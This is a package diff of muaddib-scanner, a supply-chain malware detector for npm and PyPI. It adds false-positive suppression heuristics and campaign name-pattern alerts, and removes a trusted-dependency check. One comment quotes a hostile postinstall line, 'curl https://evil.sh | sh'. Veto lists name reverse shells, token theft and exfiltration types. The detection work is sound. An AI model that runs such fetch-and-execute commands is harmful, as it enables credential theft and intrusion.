muaddib-scanner 2.11.23 → 2.11.28

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/README.md CHANGED
@@ -275,7 +275,7 @@ With pre-commit framework:
275
275
  ```yaml
276
276
  repos:
277
277
  - repo: https://github.com/DNSZLSK/muad-dib
278
- rev: v2.11.23
278
+ rev: v2.11.24
279
279
  hooks:
280
280
  - id: muaddib-scan
281
281
  ```
@@ -296,7 +296,7 @@ repos:
296
296
  | **FPR** (Benign random, v2.10.95 measure) | **7.0%** (14/200) | 200 random npm packages, stratified sampling |
297
297
  | **ADR** (Adversarial + Holdout) | **96.3%** (103/107) | 67 adversarial + 40 holdout (107 available on disk), global threshold=20 |
298
298
 
299
- **3594 tests** across 93 files. **234 rules** (229 RULES + 5 PARANOID).
299
+ **3602 tests** across 93 files. **234 rules** (229 RULES + 5 PARANOID).
300
300
 
301
301
  > **ML retrain methodology (v2.10.51):**
302
302
  > - Ground truth: 377 confirmed_malicious via auto-labeler (OSSF malicious-packages, GitHub Advisory Database, npm registry takedown correlation)
@@ -344,7 +344,7 @@ npm test
344
344
 
345
345
  ### Testing
346
346
 
347
- - **3594 tests** across 93 modular test files
347
+ - **3602 tests** across 93 modular test files
348
348
  - **56 fuzz tests** - Malformed inputs, ReDoS, unicode, binary
349
349
  - **Datadog 17K benchmark** - 14,587 confirmed malware samples (in-scope)
350
350
  - **Ground truth validation** - 67 real-world attacks (93.85% TPR@3, 86.2% TPR@20 — v2.10.95 measure)
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "muaddib-scanner",
3
- "version": "2.11.23",
3
+ "version": "2.11.28",
4
4
  "description": "Supply-chain threat detection & response for npm & PyPI/Python",
5
5
  "main": "src/index.js",
6
6
  "bin": {
@@ -141,6 +141,15 @@ const GITHUB_RELEASE_HOSTS = ['github.com', 'objects.githubusercontent.com', 'ra
141
141
  const BUNDLE_PATH_RE = /(?:^|[\\/])(?:dist|build|lib|out|umd|esm|cjs|bundle|_next[\\/]static|\.next[\\/]static|public[\\/]static|webpack|rollup)[\\/]/i;
142
142
  const BUNDLE_FILE_RE = /\.(?:min|bundle|prod|umd|iife|esm|cjs)\.(?:m?js|cjs)$|\.min\.js$|chunk-[0-9a-f]+\.js$|vendors?~?.*\.js$/i;
143
143
 
144
+ // v2.11.27 F12: reuse the exhaustive shared regex + veto helper from the
145
+ // scanner side (covers @kitware/vtk.js, playwright/lib/utilsBundleImpl,
146
+ // .yarn/releases, hash-suffixed chunks, Stencil sys/* dirs — patterns the
147
+ // narrower local BUNDLE_PATH_RE misses).
148
+ const {
149
+ BUNDLE_PATH_RE: SHARED_BUNDLE_PATH_RE,
150
+ hasBundleVetoSignal
151
+ } = require('../shared/bundle-detect.js');
152
+
144
153
  // Threat types that indicate remote content fetch in a file (for
145
154
  // `git_hook_source_local` heuristic: absence => local source).
146
155
  const REMOTE_FETCH_TYPES = new Set([
@@ -792,6 +801,344 @@ function vendorCliSdk(result, meta) {
792
801
  return true;
793
802
  }
794
803
 
804
+ // ============================================================================
805
+ // Feature 11 — ai_agent_bot (v2.11.24, audit week3 cluster, 54 FP)
806
+ // ============================================================================
807
+ //
808
+ // Targets the third cluster from the audit 2026-05-week3 (54 entries,
809
+ // 18.9 % of FP): packages that ARE themselves multi-provider AI agents,
810
+ // orchestrators, chatbots, or IM⇄AI bridges. Examples: gm-skill (AI coding
811
+ // harness), codexmate (multi-provider orchestrator), lazyclaw (terminal
812
+ // multi-LLM CLI), linco-connect (WeChat→Claude bridge), natureco-cli
813
+ // (WhatsApp+Telegram bot), multis (Telegram chatbot), @aitne-sh/aitne
814
+ // (personal AI daemon), @jhizzard/termdeck (browser term mux with AI),
815
+ // triflux (Claude Code router), opuscode (Claude config wizard).
816
+ //
817
+ // These packages legitimately fire `dangerous_call_eval` (LLM tool-use
818
+ // execute_code feature), `remote_code_load` (bun x pkg@latest fetching),
819
+ // `detached_credential_exfil` (local session token storage), and lots
820
+ // of `env_access` + `suspicious_dataflow`. F11 cannot blacklist these —
821
+ // they ARE the core capabilities. Instead the conjunction requires:
822
+ //
823
+ // - Positive AI agent identity (name/desc/keywords/deps signal)
824
+ // - Evidence the package operates on agent runtime data (touches paths
825
+ // like ~/.claude/, ~/.codex/, ~/.cursor/, etc.)
826
+ // - Absence of SANDWORM_MODE signatures: no preinstall, no
827
+ // mcp_config_injection (F9 priority), no third-party suspicious_domain,
828
+ // no credential file harvest, no binary dropper (F2 priority).
829
+ //
830
+ // Cap 35 (aligned with F10 — broader conjunction than F9).
831
+
832
+ // Agent runtime directory regex — matches references in threat messages to
833
+ // AI tool runtime paths. Both '~/.X/' and 'os.homedir() + "/.X"' patterns
834
+ // surface as substrings here.
835
+ const AGENT_RUNTIME_PATHS_RE = /[~/\\\\]\.(?:claude|codex|cursor|windsurf|continue|openclaude|openclaudia|hermes|aiflow|tdpilot|aitne|kimi|opuscode|freddie|gm-?log|gm-?skill|termdeck|relaydesk|natureco|grok|gemini|copilot|cline|aider|cody|tabnine|cursor-ai|cursorrules|claude-?desktop|claude-?code|llm[- ]?cache)\b/i;
836
+
837
+ // AI agent name regex — package name signals identity.
838
+ const AGENT_NAME_RE = /(?:^|[/_-])(?:agent|bot|chat|chatbot|claw|codex|coder|swarm|harness|brain|orchestr|orchestrator|claude|llm|hermes|aider|kimi|cline|cody|aitne|opuscode|relaydesk|termdeck|gm-skill|gm-hermes|gm-qwen|gm-thebird|gm-plugkit|relipa|triflux|protocol-proxy|codexmate|lazy?claw|natureco)(?:[_-]|$)/i;
839
+
840
+ // Keywords that signal AI agent purpose (case-insensitive).
841
+ const AGENT_KEYWORDS_SET = new Set([
842
+ 'agent', 'ai', 'llm', 'chatbot', 'bot', 'claude', 'codex',
843
+ 'cursor', 'copilot', 'ollama', 'openai', 'anthropic', 'gemini',
844
+ 'multi-llm', 'multi-provider', 'orchestrator', 'coding-agent',
845
+ 'ai-agent', 'llm-agent', 'mcp-agent'
846
+ ]);
847
+
848
+ // Description regex — matches agent purpose phrases.
849
+ const AGENT_DESC_RE = /\b(?:ai|llm|claude|codex|gemini|openai|anthropic|ollama)[ -]?(?:agent|bot|chatbot|orchestrator|harness|cli|assistant|coding[ -]?agent|gateway|relay|router|harness|workspace)\b|\bmulti[ -]?provider\b|\bcoding[ -]?agent\b|\bagent[ -]?(?:bridge|router|orchestrator)\b|telegram[ -]?(?:bot|bridge)|whatsapp[ -]?(?:bot|bridge)|wechat[ -]?(?:bot|bridge)/i;
850
+
851
+ // Dependency names that signal AI agent / bot framework usage.
852
+ const AGENT_DEPS = new Set([
853
+ '@anthropic-ai/sdk', '@anthropic-ai/claude-code', '@openai/agents', 'openai',
854
+ '@google/genai', '@google/generative-ai', 'ai', 'ollama', 'groq-sdk',
855
+ 'telegraf', 'node-telegram-bot-api', '@whiskeysockets/baileys',
856
+ 'whatsapp-web.js', 'discord.js', 'eventsource', 'node-pty',
857
+ '@anthropic-ai/bedrock-sdk', '@openai/realtime-api-beta'
858
+ ]);
859
+
860
+ function _f11HasAgentIdentity(meta) {
861
+ if (!meta) return false;
862
+ const name = String(meta.name || '');
863
+ if (AGENT_NAME_RE.test(name)) return true;
864
+ const r = (meta.registryMeta || {});
865
+ const desc = r.description || meta.description || '';
866
+ if (AGENT_DESC_RE.test(desc)) return true;
867
+ if (Array.isArray(r.keywords)) {
868
+ for (const k of r.keywords) {
869
+ if (AGENT_KEYWORDS_SET.has(String(k).toLowerCase())) return true;
870
+ }
871
+ }
872
+ const deps = r.dependencies || meta.dependencies;
873
+ if (deps && typeof deps === 'object') {
874
+ for (const d of Object.keys(deps)) {
875
+ if (AGENT_DEPS.has(d)) return true;
876
+ }
877
+ }
878
+ return false;
879
+ }
880
+
881
+ function _f11HasAgentPathReference(threats) {
882
+ for (const t of threats) {
883
+ const msg = String(t.message || '');
884
+ if (AGENT_RUNTIME_PATHS_RE.test(msg)) return true;
885
+ // Also accept the threat's file field — sometimes the path leaks via the
886
+ // file location rather than the message body.
887
+ const file = String(t.file || '');
888
+ if (AGENT_RUNTIME_PATHS_RE.test(file)) return true;
889
+ }
890
+ return false;
891
+ }
892
+
893
+ /**
894
+ * Feature 11 — TRUE iff the package self-identifies as an AI agent / bot /
895
+ * multi-LLM orchestrator AND demonstrably operates on AI tool runtime
896
+ * data (~/.claude/, ~/.codex/, ~/.cursor/, etc.) AND lacks the
897
+ * SANDWORM_MODE / vendor-impersonation signatures.
898
+ *
899
+ * Conjunction of 7 conditions:
900
+ *
901
+ * C1 AI agent identity (name|desc|keywords|deps signal)
902
+ * C2 no install lifecycle hook
903
+ * C3 no `mcp_config_injection` (F9 priority)
904
+ * C4 no `suspicious_domain` threat (third-party exfil discriminator)
905
+ * C5 no credential file path in any threat message (reuse F9 regex)
906
+ * C6 >=1 threat references an agent runtime path (positive operating signal)
907
+ * C7 no `binary_dropper` / `download_exec_binary` (F2 priority)
908
+ *
909
+ * Cap 35. Same cap as F10 (broader conjunction than F9). Reuses
910
+ * `F9_CREDENTIAL_FILE_RE` from v2.11.22.
911
+ *
912
+ * Discriminator vs malware:
913
+ * - SANDWORM droppers use preinstall/postinstall (C2 blocks).
914
+ * - MCP-impersonating malware emits mcp_config_injection (C3 → F9).
915
+ * - Exfilers have suspicious_domain (C4 blocks).
916
+ * - Binary droppers (C7 → F2 territory).
917
+ * - Credential file harvesters (C5 blocks).
918
+ *
919
+ * Covers up to 54 FP (18.9% of audit week3). Effective estimated coverage
920
+ * 30-40 (55-75%): the rest lack agent runtime path references or fire on
921
+ * suspicious_domain due to Chinese model rerouting (yingclaw pattern).
922
+ */
923
+ function aiAgentBot(result, meta) {
924
+ // C1 — identity
925
+ if (!_f11HasAgentIdentity(meta)) return false;
926
+ const threats = (result && result.threats) || [];
927
+ if (threats.length === 0) return false;
928
+ // C2 — no install lifecycle hook
929
+ if (hasLifecycleScripts(meta)) return false;
930
+ // C3, C4, C7 — fast threat-type checks
931
+ for (const t of threats) {
932
+ if (t.type === 'mcp_config_injection') return false; // C3
933
+ if (t.type === 'suspicious_domain') return false; // C4
934
+ if (t.type === 'binary_dropper') return false; // C7
935
+ if (t.type === 'download_exec_binary') return false; // C7
936
+ }
937
+ // C5 — no credential file path in any message
938
+ for (const t of threats) {
939
+ if (F9_CREDENTIAL_FILE_RE.test(String(t.message || ''))) return false;
940
+ }
941
+ // C6 — at least one threat references an agent runtime path
942
+ if (!_f11HasAgentPathReference(threats)) return false;
943
+ return true;
944
+ }
945
+
946
+ // ============================================================================
947
+ // Feature 12 — vendor_minified_bundle (v2.11.27, weekly review 2026-05-22, 9 FP)
948
+ // ============================================================================
949
+ //
950
+ // Targets the @photoroom/ui (1.8MB UMD bundle, 6 cascade types) and
951
+ // @vkontakte/videoplayer-shared (32KB min, 4 cascade types) cluster: vendor
952
+ // React/JS bundles where webpack/rollup/esbuild output legitimately produces
953
+ // `eval`, `new Function`, prototype mutations for framework reactivity,
954
+ // `Proxy({set/get})` interceptors, credential-regex-looking strings, and
955
+ // minified blobs that trip the obfuscation heuristic. Per-file co-occurrence
956
+ // of >=3 of those patterns on a path matching BUNDLE_PATH_RE is the signal.
957
+ //
958
+ // Complements F1 (bundleWithoutInstallScripts, cap 30) which requires ALL
959
+ // threat files to exceed 100KB and ALL threats to carry t.file — both
960
+ // conditions are too strict for the v2.11.27 cluster (vkontakte is 32KB; the
961
+ // cluster co-occurs with package-level `intent_credential_exfil` for some
962
+ // packages). F12 uses a 20KB floor per cascade file and an explicit C3
963
+ // veto on package-level exfil intents instead of disqualifying outright.
964
+
965
+ const CASCADE_TYPES = new Set([
966
+ 'credential_regex_harvest', // MUADDIB-AST-041
967
+ 'dangerous_call_eval', // MUADDIB-AST-004
968
+ 'dangerous_call_function', // MUADDIB-AST-005
969
+ 'prototype_pollution', // MUADDIB-AST-065
970
+ 'proxy_data_intercept', // MUADDIB-AST-043
971
+ 'remote_code_load', // MUADDIB-AST-040
972
+ 'obfuscation_detected', // src/scanner/obfuscation.js
973
+ 'js_obfuscation_pattern'
974
+ ]);
975
+ const CASCADE_MIN_TYPES = 3;
976
+ const CASCADE_MIN_FILE_BYTES = 20 * 1024;
977
+
978
+ /**
979
+ * Feature 12 — TRUE iff the package ships at least one minified vendor
980
+ * bundle file with >=3 distinct CASCADE_TYPES firing on it AND has no
981
+ * install lifecycle script AND no veto signal AND no package-level exfil
982
+ * intent.
983
+ *
984
+ * Discriminator vs malware injected into a bundle:
985
+ * - hasBundleVetoSignal (src/shared/bundle-detect.js) catches reverse_shell,
986
+ * node_modules_write, npm_publish_worm, npm_token_steal, systemd_persistence,
987
+ * unicode_invisible_injection (GlassWorm), ioc_match,
988
+ * known_malicious_package, shai_hulud_marker, detached_credential_exfil,
989
+ * ai_config_injection, ide_task_persistence, plus env_access on
990
+ * SENSITIVE_ENV_RE (NPM_TOKEN, AWS_*, SSH_*, etc.).
991
+ * - C3 catches Axios UNC1069-style package-level intent_credential_exfil /
992
+ * intent_command_exfil (no `t.file` → not file-scoped → real campaign).
993
+ * - C2 (no lifecycle) catches postinstall droppers.
994
+ * - C7 (20KB floor) catches hand-written 4KB eval injections in dist/.
995
+ *
996
+ * Cap 25 (MEDIUM). Tighter than F1=30: the cascade of >=3 bundler-emitted
997
+ * heuristics on a single file is a stronger structural bundler signature
998
+ * than "any large file with no install hook".
999
+ */
1000
+ function vendorMinifiedBundle(result, meta) {
1001
+ if (!meta || !meta.registryMeta || meta.registryMeta.scripts === undefined) return false;
1002
+ if (hasLifecycleScripts(meta)) return false;
1003
+
1004
+ const threats = (result && result.threats) || [];
1005
+ if (threats.length === 0) return false;
1006
+
1007
+ // C3 — package-level exfil intent disqualifies (real campaign signal,
1008
+ // not bundler artifact: bundlers never produce intent threats without
1009
+ // a backing file).
1010
+ for (const t of threats) {
1011
+ if ((t.type === 'intent_credential_exfil' || t.type === 'intent_command_exfil') && !t.file) {
1012
+ return false;
1013
+ }
1014
+ }
1015
+
1016
+ const summary = (result && result.summary) || {};
1017
+ const fileSizes = summary.fileSizes || {};
1018
+ const typesByFile = new Map();
1019
+
1020
+ for (const t of threats) {
1021
+ if (!t.file || !CASCADE_TYPES.has(t.type)) continue;
1022
+ if (!SHARED_BUNDLE_PATH_RE.test(t.file) && !BUNDLE_FILE_RE.test(t.file)) continue;
1023
+ if (!typesByFile.has(t.file)) typesByFile.set(t.file, new Set());
1024
+ typesByFile.get(t.file).add(t.type);
1025
+ }
1026
+
1027
+ for (const [file, types] of typesByFile) {
1028
+ if (types.size < CASCADE_MIN_TYPES) continue;
1029
+ if (hasBundleVetoSignal(threats, file)) continue;
1030
+ const size = fileSizes[file];
1031
+ if (typeof size === 'number' && size < CASCADE_MIN_FILE_BYTES) continue;
1032
+ return true;
1033
+ }
1034
+ return false;
1035
+ }
1036
+
1037
+ // ============================================================================
1038
+ // Feature 13 — typosquat_benign_lifecycle (v2.11.28, weekly review 2026-05-22, 9 FP)
1039
+ // ============================================================================
1040
+ //
1041
+ // Targets the dependency_typosquat boundary-squat cluster (Axios UNC1069 rule
1042
+ // RT-C1 fired in March 2026 + RT-C1-FPR audit 2026-05). The boundary-squat
1043
+ // scanner emits `dependency_typosquat` MEDIUM on any sub-dep matching
1044
+ // `<prefix>-<popular>` or `<popular>-<suffix>` when the extra token is not in
1045
+ // LEGIT_BOUNDARY_TOKENS. The compound `typosquat_lifecycle` (CRITICAL,
1046
+ // src/scoring.js:517-523) escalates it to CRITICAL whenever a lifecycle hook
1047
+ // is present — including provably benign ones like `husky install`,
1048
+ // `npm run build`, or `node patches/apply-patches.js` (balena-cli pattern).
1049
+ //
1050
+ // F13 suppresses that compound's contribution when all lifecycle scripts are
1051
+ // provably benign AND no real exfil / IOC / `dependency_typosquat_used`
1052
+ // signal is present. The Axios UNC1069 discriminator (require()d sub-dep)
1053
+ // emits dependency_typosquat_used + the dependency_typosquat_require
1054
+ // compound — both vetoed in F13_VETO_TYPES.
1055
+ //
1056
+ // Reuses `isSafeLifecycleScript` from src/monitor/temporal.js:53 (covers
1057
+ // `npm run build`, `tsc`, `eslint`, etc.) and extends it with audit-observed
1058
+ // patterns: husky install, simple-git-hooks, patch-package,
1059
+ // `node patches/apply-patches.js`, is-ci || X guard.
1060
+
1061
+ const { isSafeLifecycleScript } = require('../monitor/temporal.js');
1062
+
1063
+ const F13_BENIGN_SCRIPT_RE = /^(?:is-ci\s*\|\|\s*)?(?:husky(?:\s+install)?|simple-git-hooks|patch-package|node\s+patches\/apply-patches\.js|npm\s+run\s+build(?::[a-z0-9_-]+)?)\s*$/i;
1064
+
1065
+ function isBenignLifecycleScript(value) {
1066
+ if (!value || typeof value !== 'string') return false;
1067
+ if (isSafeLifecycleScript(value)) return true;
1068
+ return value.trim().split(/\s*&&\s*/).every(cmd => F13_BENIGN_SCRIPT_RE.test(cmd.trim()));
1069
+ }
1070
+
1071
+ const F13_VETO_TYPES = new Set([
1072
+ // Egress / exfil — any real network capability is a campaign signal
1073
+ 'suspicious_dataflow', 'suspicious_domain', 'remote_code_load', 'curl_exec',
1074
+ 'intent_credential_exfil', 'intent_command_exfil', 'fetch_decrypt_exec',
1075
+ 'reverse_shell', 'binary_dropper', 'download_exec_binary',
1076
+ 'curl_env_exfil', 'external_tarball_dep', 'dependency_url_suspicious',
1077
+ 'blockchain_c2_resolution', 'dns_exfil',
1078
+ // Worm propagation (Shai-Hulud)
1079
+ 'npm_publish_worm', 'node_modules_write', 'npm_token_steal',
1080
+ // IOC hits
1081
+ 'ioc_match', 'known_malicious_package', 'shai_hulud_marker', 'ioc_string_match',
1082
+ // DPRK / mini Shai-Hulud 2026-05
1083
+ 'detached_credential_exfil', 'ai_config_injection', 'ide_task_persistence',
1084
+ // Axios UNC1069 discriminator: dep is require()d in code
1085
+ 'dependency_typosquat_used', 'dependency_typosquat_require'
1086
+ ]);
1087
+
1088
+ const F13_LIFECYCLE_KEYS = ['preinstall', 'install', 'postinstall', 'prepare'];
1089
+
1090
+ /**
1091
+ * Feature 13 — TRUE iff the package shows the compound `typosquat_lifecycle`
1092
+ * (boundary-squat dep + lifecycle hook) AND every declared lifecycle script
1093
+ * is provably benign AND no exfil / IOC / dep-usage signal is present.
1094
+ *
1095
+ * Discriminator vs malware:
1096
+ * - Axios UNC1069 wrappers emit `dependency_typosquat_used` (the dep is
1097
+ * require()d in source) + compound `dependency_typosquat_require` → veto.
1098
+ * - Shai-Hulud worm emits `npm_publish_worm`, `node_modules_write`,
1099
+ * `npm_token_steal` → veto.
1100
+ * - GlassWorm / DPRK emit `unicode_invisible_injection` (downstream
1101
+ * irrelevant — caught at scanner severity)/ `detached_credential_exfil`
1102
+ * / `ai_config_injection` / `ide_task_persistence` → veto.
1103
+ * - Real install-time droppers carry suspicious_dataflow / suspicious_domain
1104
+ * / remote_code_load / curl_exec / intent_*_exfil → veto.
1105
+ * - Hand-crafted `curl https://evil.sh | sh` postinstall fails
1106
+ * isBenignLifecycleScript → veto.
1107
+ *
1108
+ * Targets the v2.11.28 weekly review 2026-05-22 cluster:
1109
+ * - @doyourjob/gravity-ui-page-constructor (prepare: husky install)
1110
+ * - balena-cli (postinstall: node patches/apply-patches.js)
1111
+ * - magmastream (prepare: npm run build)
1112
+ * - @1d1s/design-system (prepare: npm run build:lib)
1113
+ * - @healthcare-interoperability/fhir-storage-core (prepare: npm run build)
1114
+ * - @quicore/problem-details-error (prepare: npm run build)
1115
+ *
1116
+ * Cap 30 (MEDIUM). Matches the F9 (mcp_server_env_access) cap because both
1117
+ * suppress a compound-driven CRITICAL into the residual MEDIUM signal.
1118
+ */
1119
+ function typosquatBenignLifecycle(result, meta) {
1120
+ const threats = (result && result.threats) || [];
1121
+ if (!threats.some(t => t.type === 'dependency_typosquat' || t.type === 'typosquat_detected')) return false;
1122
+ if (!threats.some(t => t.type === 'lifecycle_script')) return false;
1123
+ if (!threats.some(t => t.type === 'typosquat_lifecycle')) return false;
1124
+
1125
+ for (const t of threats) {
1126
+ if (F13_VETO_TYPES.has(t.type)) return false;
1127
+ }
1128
+
1129
+ const scripts = (meta && meta.registryMeta && meta.registryMeta.scripts) || null;
1130
+ if (!scripts || typeof scripts !== 'object') return false;
1131
+
1132
+ let sawScript = false;
1133
+ for (const key of F13_LIFECYCLE_KEYS) {
1134
+ const v = scripts[key];
1135
+ if (typeof v !== 'string' || v.trim().length === 0) continue;
1136
+ sawScript = true;
1137
+ if (!isBenignLifecycleScript(v)) return false;
1138
+ }
1139
+ return sawScript;
1140
+ }
1141
+
795
1142
  /**
796
1143
  * Feature 8 — TRUE iff the package declares at least one install
797
1144
  * lifecycle script AND the scan shows no network egress capability
@@ -946,6 +1293,8 @@ function extractFeatures(result, meta) {
946
1293
  features.mcp_server_env_access = mcpServerEnvAccess(result, meta) ? 1 : 0;
947
1294
  // --- v2.11.23 Feature 10 (audit week3 cluster — up to 96 FP) ---
948
1295
  features.vendor_cli_sdk = vendorCliSdk(result, meta) ? 1 : 0;
1296
+ // --- v2.11.24 Feature 11 (audit week3 cluster — up to 54 FP) ---
1297
+ features.ai_agent_bot = aiAgentBot(result, meta) ? 1 : 0;
949
1298
 
950
1299
  return features;
951
1300
  }
@@ -1026,5 +1375,9 @@ module.exports = {
1026
1375
  placeholderAntiDepConfusion,
1027
1376
  installScriptNoNetworkEgress,
1028
1377
  mcpServerEnvAccess,
1029
- vendorCliSdk
1378
+ vendorCliSdk,
1379
+ aiAgentBot,
1380
+ vendorMinifiedBundle,
1381
+ typosquatBenignLifecycle,
1382
+ isBenignLifecycleScript
1030
1383
  };
@@ -14,7 +14,23 @@ const {
14
14
  loadNpmSeq, saveNpmSeq, CHANGES_STREAM_URL, CHANGES_LIMIT, CHANGES_CATCHUP_MAX,
15
15
  savePypiSerial, PYPI_XMLRPC_URL, PYPI_CATCHUP_MAX
16
16
  } = require('./state.js');
17
- const { sendIOCPreAlert } = require('./webhook.js');
17
+ const { sendIOCPreAlert, sendCampaignPreAlert } = require('./webhook.js');
18
+
19
+ // Active-campaign name patterns. Pre-alert fires on match BEFORE tarball
20
+ // download so operators have visibility while IOC lists catch up (typical
21
+ // lag: hours to days).
22
+ // did-NNNN (May 2026): wave of did-0001..did-9999 publications observed in
23
+ // the changes stream — name shape alone is enough to flag for fast triage.
24
+ const CAMPAIGN_PATTERNS = [
25
+ { name: 'did-NNNN', re: /^did-\d{4}$/ }
26
+ ];
27
+
28
+ function matchCampaignPattern(name) {
29
+ for (const c of CAMPAIGN_PATTERNS) {
30
+ if (c.re.test(name)) return c.name;
31
+ }
32
+ return null;
33
+ }
18
34
  const { evaluateCacheTrigger, POPULAR_THRESHOLD, downloadsCache, DOWNLOADS_CACHE_TTL } = require('./classify.js');
19
35
 
20
36
  const SELF_PACKAGE_NAME = require('../../package.json').name;
@@ -133,105 +149,6 @@ async function getWeeklyDownloads(packageName) {
133
149
  }
134
150
  }
135
151
 
136
- // --- Trusted dependency diff check ---
137
-
138
- const TRUSTED_DEP_AGE_THRESHOLD_MS = 7 * 24 * 60 * 60 * 1000; // 7 days
139
-
140
- /**
141
- * Check for new dependencies added to a TRUSTED (popular) package.
142
- * Detects supply-chain attacks where a compromised maintainer account adds a
143
- * malicious dependency in a patch bump (e.g., axios 1.14.0 → 1.14.1 adding
144
- * plain-crypto-js, 2026-03-30).
145
- *
146
- * @param {string} name - Package name
147
- * @param {string} newVersion - Newly published version
148
- * @returns {Array} Array of findings (empty if no new deps or on error)
149
- */
150
- async function checkTrustedDepDiff(name, newVersion) {
151
- const findings = [];
152
- try {
153
- // Fetch packument to get version list and dependencies
154
- const body = await httpsGet(`https://registry.npmjs.org/${encodeURIComponent(name)}`, 10_000);
155
- const packument = JSON.parse(body);
156
-
157
- if (!packument.versions || !packument.time) return findings;
158
-
159
- // Sort versions by publish time (not semver — handles prereleases correctly)
160
- const timeMap = packument.time;
161
- const versionKeys = Object.keys(packument.versions)
162
- .filter(v => timeMap[v])
163
- .sort((a, b) => new Date(timeMap[a]) - new Date(timeMap[b]));
164
-
165
- const newIdx = versionKeys.indexOf(newVersion);
166
- if (newIdx <= 0) return findings; // First version or not found
167
-
168
- const prevVersion = versionKeys[newIdx - 1];
169
-
170
- const prevDeps = (packument.versions[prevVersion] && packument.versions[prevVersion].dependencies) || {};
171
- const newDeps = (packument.versions[newVersion] && packument.versions[newVersion].dependencies) || {};
172
-
173
- // Find newly added dependencies (name not present in previous version)
174
- const addedDeps = Object.keys(newDeps).filter(dep => !(dep in prevDeps));
175
- if (addedDeps.length === 0) return findings;
176
-
177
- console.log(`[MONITOR] TRUSTED dep diff: ${name} ${prevVersion} → ${newVersion}: +${addedDeps.length} new dep(s): ${addedDeps.join(', ')}`);
178
-
179
- for (const dep of addedDeps) {
180
- let ageMs = null;
181
- try {
182
- const depBody = await httpsGet(`https://registry.npmjs.org/${encodeURIComponent(dep)}`, 5_000);
183
- const depData = JSON.parse(depBody);
184
- const created = depData.time && depData.time.created;
185
- if (created) {
186
- ageMs = Date.now() - new Date(created).getTime();
187
- }
188
- } catch (err) {
189
- console.log(`[MONITOR] WARNING: could not check age of dependency ${dep}: ${err.message}`);
190
- }
191
-
192
- if (ageMs === null || ageMs < TRUSTED_DEP_AGE_THRESHOLD_MS) {
193
- // Unknown or < 7 days old — CRITICAL
194
- const ageDays = ageMs !== null ? Math.floor(ageMs / 86400000) : 'unknown';
195
- findings.push({
196
- type: 'trusted_new_unknown_dependency',
197
- severity: 'CRITICAL',
198
- confidence: ageMs === null ? 'medium' : 'high',
199
- file: 'package.json',
200
- message: `TRUSTED package ${name} added unknown dependency ${dep} (age: ${ageDays}d) in version ${prevVersion} → ${newVersion}`,
201
- rule_id: 'MUADDIB-TRUSTED-001',
202
- mitre: 'T1195.002',
203
- dep,
204
- depAgeDays: ageDays,
205
- prevVersion,
206
- newVersion
207
- });
208
- } else {
209
- // Known dependency (>= 7 days old) — HIGH
210
- const ageDays = Math.floor(ageMs / 86400000);
211
- findings.push({
212
- type: 'trusted_new_dependency',
213
- severity: 'HIGH',
214
- confidence: 'medium',
215
- file: 'package.json',
216
- message: `TRUSTED package ${name} added new dependency ${dep} (age: ${ageDays}d) in version ${prevVersion} → ${newVersion}`,
217
- rule_id: 'MUADDIB-TRUSTED-002',
218
- mitre: 'T1195.002',
219
- dep,
220
- depAgeDays: ageDays,
221
- prevVersion,
222
- newVersion
223
- });
224
- }
225
- }
226
-
227
- return findings;
228
- } catch (err) {
229
- // Graceful fallback — log warning, continue as TRUSTED
230
- console.log(`[MONITOR] WARNING: trusted dep diff check failed for ${name}@${newVersion}: ${err.message}`);
231
- return findings;
232
- }
233
- }
234
-
235
152
  // --- Tarball URL helpers ---
236
153
 
237
154
  function getNpmTarballUrl(pkgData) {
@@ -595,6 +512,20 @@ async function pollNpmChanges(state, scanQueue, stats) {
595
512
  console.warn(`[MONITOR] IOC pre-check failed: ${err.message}`);
596
513
  }
597
514
 
515
+ // Layer 1b: Campaign pre-alert — fire on name-pattern matches when the
516
+ // package isn't already a known IOC (avoid duplicate webhooks for the
517
+ // same publication). Lets us flag campaign waves while IOC lists lag.
518
+ if (!isKnownIOC) {
519
+ const campaign = matchCampaignPattern(name);
520
+ if (campaign) {
521
+ console.log(`[MONITOR] CAMPAIGN PRE-ALERT: ${name} — matches ${campaign}`);
522
+ stats.campaignPreAlerts = (stats.campaignPreAlerts || 0) + 1;
523
+ sendCampaignPreAlert(name, campaign).catch(err => {
524
+ console.error(`[MONITOR] campaign pre-alert webhook failed for ${name}: ${err.message}`);
525
+ });
526
+ }
527
+ }
528
+
598
529
  // Layer 2: Extract tarball URL from CouchDB doc (eliminates lazy resolution 404 race)
599
530
  const docMeta = change.doc ? extractTarballFromDoc(change.doc) : null;
600
531
 
@@ -690,9 +621,10 @@ async function pollNpmRss(state, scanQueue, stats) {
690
621
 
691
622
  // Layer 1: IOC pre-alert (RSS fallback path)
692
623
  // Only wildcard IOCs trigger here; versioned IOCs checked in resolveTarballAndScan().
624
+ let isKnownIOC = false;
693
625
  try {
694
626
  const iocs = loadCachedIOCs();
695
- const isKnownIOC = iocs.wildcardPackages && iocs.wildcardPackages.has(name);
627
+ isKnownIOC = iocs.wildcardPackages && iocs.wildcardPackages.has(name);
696
628
  if (isKnownIOC) {
697
629
  console.log(`[MONITOR] IOC PRE-ALERT: ${name} — known malicious package detected via RSS`);
698
630
  stats.iocPreAlerts = (stats.iocPreAlerts || 0) + 1;
@@ -702,6 +634,18 @@ async function pollNpmRss(state, scanQueue, stats) {
702
634
  }
703
635
  } catch { /* IOC load failure is non-fatal */ }
704
636
 
637
+ // Layer 1b: Campaign pre-alert (RSS fallback path) — mirrors pollNpmChanges.
638
+ if (!isKnownIOC) {
639
+ const campaign = matchCampaignPattern(name);
640
+ if (campaign) {
641
+ console.log(`[MONITOR] CAMPAIGN PRE-ALERT: ${name} — matches ${campaign} (RSS)`);
642
+ stats.campaignPreAlerts = (stats.campaignPreAlerts || 0) + 1;
643
+ sendCampaignPreAlert(name, campaign).catch(err => {
644
+ console.error(`[MONITOR] campaign pre-alert webhook failed for ${name}: ${err.message}`);
645
+ });
646
+ }
647
+ }
648
+
705
649
  // Queue npm packages — tarball URL resolved during scan
706
650
  scanQueue.push({
707
651
  name,
@@ -1150,8 +1094,6 @@ module.exports = {
1150
1094
  httpsGet,
1151
1095
  httpsPost,
1152
1096
  getWeeklyDownloads,
1153
- checkTrustedDepDiff,
1154
- TRUSTED_DEP_AGE_THRESHOLD_MS,
1155
1097
 
1156
1098
  // Tarball URL helpers
1157
1099
  getNpmTarballUrl,
@@ -1183,6 +1125,10 @@ module.exports = {
1183
1125
  pollPyPI,
1184
1126
